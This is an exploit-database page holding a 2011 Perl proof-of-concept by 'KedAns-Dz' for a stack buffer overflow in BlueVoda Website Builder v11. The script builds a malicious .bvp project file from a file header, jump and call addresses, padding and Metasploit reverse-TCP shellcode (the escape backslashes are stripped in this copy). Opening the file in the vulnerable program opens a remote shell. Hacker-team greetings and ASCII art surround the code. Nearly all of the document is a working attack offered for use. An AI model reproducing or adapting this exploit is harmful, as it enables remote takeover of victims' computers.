Home / exploitsPDF  

BlueVoda Website Builder 11 Buffer Overflow

Posted on 09 May 2011

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /'             __  /'__`        / \__  /'__`                   0
0  /\_,     ___   /\_/\_      ___  ,_/ /   _ ___           1
1  /_/  /' _ ` / /_/_\_<_  /'___  /    /`'__          0
0       / /    /   / \__/  \_  \_   /           1
1       \_ \_ \_\_   \____/ \____\ \__\ \____/ \_           0
0       /_//_//_/ \_ /___/  /____/ /__/ /___/  /_/           1
1                   \____/ >> Exploit database separated by exploit   0
0                   /___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0               I'm KedAns-Dz member from Inj3ct0r Team                1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

#!/usr/bin/perl
system("cls");
sub logo(){
print q'
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
1                      ______                                          0
0                   .-"      "-.                                       1
1                  / KedAns-Dz   =-=-=-=-=-=-=-=-=-=-=-|              0
0 Algerian HaCker |              | > Site : 1337day.com |              1
1 --------------- |,  .-.  .-.  ,| > Twitter : @kedans  |              0
0                 | )(_o/  o_)( | > ked-h@hotmail.com  |              1
1                 |/     /     | =-=-=-=-=-=-=-=-=-=-=|              0
0       (@_       (_     ^^     _)  HaCkerS-StreeT-Team                1
1  _     ) \_______\__|IIIIII|__/_______________________               0
0 (_)@8@8{}<________|-IIIIII/-|________________________>              1
1        )_/                  /                                       0
0       (@           `--------` © 2011, Inj3ct0r Team                  1
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-0
0     BlueVoda Website Builder v.11 (.bvp) Stack Buffer Overflow       1
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-0
';
}
# ---------
# BlueVoda Website Builder v.11 (.bvp) Stack Buffer Overflow
# Author : KedAns-Dz <ked-h@hotmail.com || ked-h@exploit-id.com>
# special thanks to : Inj3ct0r Team + Exploit-Id Team
# Tested in Windows XP sp3 France
# ---------
logo();
my $header = # BlueVoda Project (bvp) Header
"xd0xcfx11xe0xa1xb1x1axe1x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x3ex00x03x00xfexffx09";
my $jump = "xebx02x90x90" ; # short jump - from BlueVoda.exe
my $call = "xffx52x7c"; # Call - from BlueVoda.exe
my $junk = "x41" x 321; # Buffer
my $nops = "x90" x 51; # Nopsled
# windows/shell_reverse_tcp - 340 bytes (http://www.metasploit.com)
# LHOST=127.0.0.1, LPORT=4444, Encoder: x86/call4_dword_xor
my $shell =
"x29xc9x83xe9xb1xe8xffxffxffxffxc0x5ex81x76" .
"x0ex4ex5axfaxc3x83xeexfcxe2xf4xb2xb2x73xc3" .
"x4ex5ax9ax4axabx6bx28xa7xc5x08xcax48x1cx56" .
"x71x91x5axd1x88xebx41xedxb0xe5x7fxa5xcbx03" .
"xe2x66x9bxbfx4cx76xdax02x81x57xfbx04xacxaa" .
"xa8x94xc5x08xeax48x0cx66xfbx13xc5x1ax82x46" .
"x8ex2exb0xc2x9ex0ax71x8bx56xd1xa2xe3x4fx89" .
"x19xffx07xd1xcex48x4fx8cxcbx3cx7fx9ax56x02" .
"x81x57xfbx04x76xbax8fx37x4dx27x02xf8x33x7e" .
"x8fx21x16xd1xa2xe7x4fx89x9cx48x42x11x71x9b" .
"x52x5bx29x48x4axd1xfbx13xc7x1exdexe7x15x01" .
"x9bx9ax14x0bx05x23x16x05xa0x48x5cxb1x7cx9e" .
"x26x69xc8xc3x4ex32x8dxb0x7cx05xaexabx02x2d" .
"xdcxc4xb1x8fx42x53x4fx5axfaxeax8ax0exaaxab" .
"x67xdax91xc3xb1x8fxaax93x1ex0axbax93x0ex0a" .
"x92x29x41x85x1ax3cx9bxd3x3dxabx31x5axfaxc2" .
"x26x58xfaxd2x12xd3x1cxa9x5ex0cxadxabxd7xff" .
"x8exa2xb1x8fx92xa0x23x3exfax4axadx0dxadx94" .
"x7fxacx90xd1x17x0cx18x3ex28x9dxbexe7x72x5b" .
"xfbx4ex0ax7exeax05x4ex1exaex93x18x0cxacx85" .
"x18x14xacx95x1dx0cx92xbax82x65x7cx3cx9bxd3" .
"x1ax8dx18x1cx05xf3x26x52x7dxdex2exa5x2fx78" .
"xbexefx58x95x26xfcx6fx7exd3xa5x2fxffx48x26" .
"xf0x43xb5xbax8fxc6xf5x1dxe9xb1x21x30xfax90" .
"xb1x8fxfaxc3";
my $exploit = $header.$jump.$junk.$call.$shell.$nops;
open(myfile,'>>KedAns.bvp');
print myfile $exploit;
close (myfile);

#================[ Exploited By KedAns-Dz * HST-Dz * ]===========================================
# Greets To : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS >
# + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (www.1337day.com)
# Inj3ct0r Members 31337 : Indoushka * KnocKout * eXeSoul * eidelweiss * SeeMe * XroGuE * agix *
# gunslinger_ * Sn!pEr.S!Te * ZoRLu * anT!-Tr0J4n * ^Xecuti0N3r 'www.1337day.com/team' ++ ....
# Exploit-Id Team : jos_ali_joe + Caddy-Dz (exploit-id.com) ... All Others * TreX (hotturks.org)
# JaGo-Dz (sec4ever.com) * KelvinX (kelvinx.net) * PaCketStorm Team (www.packetstormsecurity.org)
# www.metasploit.com * www.securityreason.com * All Security and Exploits Webs ...
#================================================================================================

 

TOP

Malware :

Exploits :